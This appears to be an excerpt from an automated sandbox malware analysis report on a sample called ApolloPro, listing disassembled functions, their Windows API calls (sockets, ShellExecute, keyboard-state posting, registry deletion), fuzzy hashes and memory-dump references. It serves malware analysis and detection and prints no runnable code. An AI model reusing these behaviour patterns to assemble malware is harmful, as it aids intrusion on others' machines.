                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                              • String ID: X
                                                                                              • API String ID: 774024439-3081909835
                                                                                              • Opcode ID: 05d1187eb966820238598351034d68af7980f4eccb91f4972c7eb84cee0157bf
                                                                                              • Instruction ID: b767035906b1aec9ef1dd9c62745009483bd38918fdf3de10a0f589d689b424d
                                                                                              • Opcode Fuzzy Hash: 05d1187eb966820238598351034d68af7980f4eccb91f4972c7eb84cee0157bf
                                                                                              • Instruction Fuzzy Hash: 13C19F715043419FCB54EF64C881A9AB7EABF85310F01492DF899CB7A2DB30ED45CB86
                                                                                              Function 006A71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006A72EB
                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006A730C
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A731F
                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 006A73D5
                                                                                              • inet_ntoa.WSOCK32(?), ref: 006A7392
                                                                                                • Part of subcall function 0068B4EA: _strlen.LIBCMT ref: 0068B4F4
                                                                                                • Part of subcall function 0068B4EA: _memmove.LIBCMT ref: 0068B516
                                                                                              • _strlen.LIBCMT ref: 006A742F
                                                                                              • _memmove.LIBCMT ref: 006A7498
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 3619996494-0
                                                                                              • Opcode ID: a18b0065eab77975574609d9bb7c2b575ee6d23f23a1918557923e44ffd56a8f
                                                                                              • Instruction ID: c18c8317c91b32ee479cc9bff59e5ecbca6b77eabeae470e2405d855e6ee6c0a
                                                                                              • Opcode Fuzzy Hash: a18b0065eab77975574609d9bb7c2b575ee6d23f23a1918557923e44ffd56a8f
                                                                                              • Instruction Fuzzy Hash: 7881CE71508200ABD750EB24DC82F6BB7EAEF89714F14461CF9569B292DB70ED01CBA5
                                                                                              Function 00631800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 58d61e663b0fb658cec48cf45d3b2ca42dea70cd385a22cf0092875a6b0bf815
                                                                                              • Instruction ID: 6e4bce763edd2d26fe25149330dbba07c6c1bba0cb20120ee1a3248f3dda217c
                                                                                              • Opcode Fuzzy Hash: 58d61e663b0fb658cec48cf45d3b2ca42dea70cd385a22cf0092875a6b0bf815
                                                                                              • Instruction Fuzzy Hash: 91714C70900109EFDB14DF98CC89EFEBB7AFF86314F148159F915AA251C734AA52CBA4
                                                                                              Function 006BB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindow.USER32(00DD52C0), ref: 006BBA5D
                                                                                              • IsWindowEnabled.USER32(00DD52C0), ref: 006BBA69
                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 006BBB4D
                                                                                              • SendMessageW.USER32(00DD52C0,000000B0,?,?), ref: 006BBB84
                                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 006BBBC1
                                                                                              • GetWindowLongW.USER32(00DD52C0,000000EC), ref: 006BBBE3
                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006BBBFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                              • String ID:
                                                                                              • API String ID: 4072528602-0
                                                                                              • Opcode ID: 3f07066c0d6fccacf70c4ab7d248f2624bbedb7279178a07507b8574b9690915
                                                                                              • Instruction ID: a266641277b9d082ed3b494e45a688df10f2672dc1c94c07f46ce98ec9fc4212
                                                                                              • Opcode Fuzzy Hash: 3f07066c0d6fccacf70c4ab7d248f2624bbedb7279178a07507b8574b9690915
                                                                                              • Instruction Fuzzy Hash: 9771AEB4A04204AFEB20DF54C894FFABBBBEF49300F146059E95597365CBB1AC91CB60
                                                                                              Function 006AFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006AFB31
                                                                                              • _memset.LIBCMT ref: 006AFBFA
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 006AFC3F
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                              • GetProcessId.KERNEL32(00000000), ref: 006AFCB6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006AFCE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3522835683-2766056989
                                                                                              • Opcode ID: 70ff32382e17526369457b0696bcb6c0a4e2faec25bd144a3c1b38e38341229e
                                                                                              • Instruction ID: 66d8b11ea567d2bb6a32249c2e6adedc4288cdcd916467207fa130e608416dae
                                                                                              • Opcode Fuzzy Hash: 70ff32382e17526369457b0696bcb6c0a4e2faec25bd144a3c1b38e38341229e
                                                                                              • Instruction Fuzzy Hash: A1618974A006199FCB14EFA4C891AAEB7F6FF49320F10846DE806AB351CB30AD41CF95
                                                                                              Function 0069174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0069178B
                                                                                              • GetKeyboardState.USER32(?), ref: 006917A0
                                                                                              • SetKeyboardState.USER32(?), ref: 00691801
                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0069182F
                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0069184E
                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00691894
                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006918B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 0846c56d140ece9ac9f95a16d4c832f062cee49b4b2b167a23ea89670caef0f8
                                                                                              • Instruction ID: 2224250841ce7f0d0a35a2e24769a99415343a938ae616b4a01fc6cd08a65380
                                                                                              • Opcode Fuzzy Hash: 0846c56d140ece9ac9f95a16d4c832f062cee49b4b2b167a23ea89670caef0f8
                                                                                              • Instruction Fuzzy Hash: F151D2A0A087D73EFF3646648815BFA7EEF5B07300F288589E0D94DDD2C298AC85E750
                                                                                              Function 00691565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(00000000), ref: 006915A4
                                                                                              • GetKeyboardState.USER32(?), ref: 006915B9
                                                                                              • SetKeyboardState.USER32(?), ref: 0069161A
                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00691646
                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00691663
                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006916A7
                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006916C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 35d3a74bc04b59929a5433ca550bb1b1e4d0894b5e78f9997a706229aa7a0456
                                                                                              • Instruction ID: 6d3ee88d6072f587d15c66a30ed6c82e3da08b518aa3b122aee1e287d78c30c5
                                                                                              • Opcode Fuzzy Hash: 35d3a74bc04b59929a5433ca550bb1b1e4d0894b5e78f9997a706229aa7a0456
                                                                                              • Instruction Fuzzy Hash: 2A51C2A0A046D73DFF3287648C55BBA7EAE5B07300F2C8589E1D54EEC2C694AC99E750
                                                                                              Function 00695BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 2945705084-0
                                                                                              • Opcode ID: 529ba13e42b2d8350799925bb13e137ed38f84b333ac0376d424fab9ae24f8a8
                                                                                              • Instruction ID: db0c6871ce9f731f3339f9ee762df74272ba2195ad8398433c5923de7f559d31
                                                                                              • Opcode Fuzzy Hash: 529ba13e42b2d8350799925bb13e137ed38f84b333ac0376d424fab9ae24f8a8
                                                                                              • Instruction Fuzzy Hash: 724193A6C1062975CB51EBB4CC469CFB3BE9F05311F50485AF909E3211EA34A759C3AE
                                                                                              Function 00693B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00693B8A,?), ref: 00694BE0
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00693B8A,?), ref: 00694BF9
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00693BAA
                                                                                              • _wcscmp.LIBCMT ref: 00693BC6
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00693BDE
                                                                                              • _wcscat.LIBCMT ref: 00693C26
                                                                                              • SHFileOperationW.SHELL32(?), ref: 00693C92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1377345388-1173974218
                                                                                              • Opcode ID: 40977615fbcac3a0b6bb1e3880fb566fb0269e6c3a82454a2247507d5bd05665
                                                                                              • Instruction ID: 0a0e3c5faea7916152c8225ca2ab55a48784cf57642c37fce6f007944e9306b0
                                                                                              • Opcode Fuzzy Hash: 40977615fbcac3a0b6bb1e3880fb566fb0269e6c3a82454a2247507d5bd05665
                                                                                              • Instruction Fuzzy Hash: DD41B17140C3459ACB92EF64C481AEFB7EDAF89340F40196EF489C3251EB34D689C756
                                                                                              Function 006B78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006B78CF
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B7976
                                                                                              • IsMenu.USER32(?), ref: 006B798E
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B79D6
                                                                                              • DrawMenuBar.USER32 ref: 006B79E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 3866635326-4108050209
                                                                                              • Opcode ID: dcacb1de0f6b37b53069b5805886643e8827cf5d5f7c7abee71597ce723e5b0a
                                                                                              • Instruction ID: f8ed2ade91005df642a3de5d59bf842ab8d03c82370c2f1e3c028e503adff816
                                                                                              • Opcode Fuzzy Hash: dcacb1de0f6b37b53069b5805886643e8827cf5d5f7c7abee71597ce723e5b0a
                                                                                              • Instruction Fuzzy Hash: 3F4117B5A08249EFDB10EF54D884EEABBBAFB45350F048129F9559B350D770AD90CFA0
                                                                                              Function 006B1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006B1631
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006B165B
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 006B1712
                                                                                                • Part of subcall function 006B1602: RegCloseKey.ADVAPI32(?), ref: 006B1678
                                                                                                • Part of subcall function 006B1602: FreeLibrary.KERNEL32(?), ref: 006B16CA
                                                                                                • Part of subcall function 006B1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006B16ED
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 006B16B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                              • String ID:
                                                                                              • API String ID: 395352322-0
                                                                                              • Opcode ID: deac25e5aac1a4ba922d09d3efe88acced85991cdf6f0132f35b6fe57814c8a2
                                                                                              • Instruction ID: f190a6e5e2c8199bf70f33723280b4bc94322071b107e160eee8ac1155e0e981
                                                                                              • Opcode Fuzzy Hash: deac25e5aac1a4ba922d09d3efe88acced85991cdf6f0132f35b6fe57814c8a2
                                                                                              • Instruction Fuzzy Hash: B8314BB1900109FFEB148F90DC99EFFB7BDEF09300F540169E501A6240EA709E859BA4
                                                                                              Function 006B68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 006B6911
                                                                                              • GetWindowLongW.USER32(00DD52C0,000000F0), ref: 006B6944
                                                                                              • GetWindowLongW.USER32(00DD52C0,000000F0), ref: 006B6979
                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006B69AB
                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006B69D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006B69E6
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B6A00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2178440468-0
                                                                                              • Opcode ID: df76329f839c3215dcd8133f0b84dd4561988be2d17a3377ea66bbf6fb672fbc
                                                                                              • Instruction ID: 224fafe3ead0e42ebd14d348a0dce2a447040882617074b05e343211dfc358ff
                                                                                              • Opcode Fuzzy Hash: df76329f839c3215dcd8133f0b84dd4561988be2d17a3377ea66bbf6fb672fbc
                                                                                              • Instruction Fuzzy Hash: D33115B0604252AFEB21DF19DC88FA537E2FB4A755F1811A4F6148B2B2CB75AC80DB50
                                                                                              Function 0068E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E2CA
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E2F0
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0068E2F3
                                                                                              • SysAllocString.OLEAUT32(?), ref: 0068E311
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0068E31A
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0068E33F
                                                                                              • SysAllocString.OLEAUT32(?), ref: 0068E34D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 261203785ec953c6625d968c1da773afc919c9341bfc7b50e01afb43340d7764
                                                                                              • Instruction ID: 53bdd0e5e79c6c0d7c6efb7f8d35941e4e99643b1fb27454962dc4f89f7db5dd
                                                                                              • Opcode Fuzzy Hash: 261203785ec953c6625d968c1da773afc919c9341bfc7b50e01afb43340d7764
                                                                                              • Instruction Fuzzy Hash: E1218376604219EFAF10EFA8DC88CBB77EEEB09360B448225FA14DB250D671ED458760
                                                                                              Function 006A685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006A8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006A84A0
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006A68B1
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A68C0
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006A68F9
                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 006A6902
                                                                                              • WSAGetLastError.WSOCK32 ref: 006A690C
                                                                                              • closesocket.WSOCK32(00000000), ref: 006A6935
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006A694E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 910771015-0
                                                                                              • Opcode ID: fc94a51903600b6f11665a1ec42bbab23e73ed7a77038479ac1e9a6c7dce3bba
                                                                                              • Instruction ID: e02033fc9ea2150d94fb59f82cdf65cbc60fcb0b3ddce60660c2febcc8adbdea
                                                                                              • Opcode Fuzzy Hash: fc94a51903600b6f11665a1ec42bbab23e73ed7a77038479ac1e9a6c7dce3bba
                                                                                              • Instruction Fuzzy Hash: 13318471600114AFEB10AF64DC85FBA77AEEF45725F08802DF905A7291DB74AC058FA1
                                                                                              Function 0068E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E3A5
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0068E3CB
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0068E3CE
                                                                                              • SysAllocString.OLEAUT32 ref: 0068E3EF
                                                                                              • SysFreeString.OLEAUT32 ref: 0068E3F8
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0068E412
                                                                                              • SysAllocString.OLEAUT32(?), ref: 0068E420
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
